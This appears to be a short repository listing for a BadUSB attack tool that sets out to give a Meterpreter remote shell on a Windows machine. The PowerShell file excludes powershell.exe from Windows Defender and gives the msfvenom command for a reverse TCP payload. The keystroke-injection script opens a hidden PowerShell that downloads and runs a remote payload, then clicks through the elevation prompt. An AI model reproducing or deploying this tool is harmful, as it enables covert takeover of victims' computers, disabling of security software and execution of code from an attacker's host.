├── README.md ├── meterpreter.ps1 └── inject.txt /README.md: -------------------------------------------------------------------------------- 1 | # BadUSB-Meterpreter 2 | Gain A Meterpreter Shell With A BadUSB Attack In Less Than 5 Seconds. 3 | -------------------------------------------------------------------------------- /meterpreter.ps1: -------------------------------------------------------------------------------- 1 | Add-MpPreference -ExclusionProcess powershell.exe 2 | #Generate Your Payload With This Command And Put It Here. 3 | msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=(IP) LPORT=(PORT) -f psh -------------------------------------------------------------------------------- /inject.txt: -------------------------------------------------------------------------------- 1 | DELAY 1000 2 | GUI r 3 | DELAY 300 4 | REM LINK TO YOUR METERPRETER PAYLOAD 5 | STRING powershell -w h iex (irm (link)) 6 | DELAY 200 7 | CTRL-SHIFT-ENTER 8 | DELAY 3000 9 | ALT y 10 | DELAY 100 11 | --------------------------------------------------------------------------------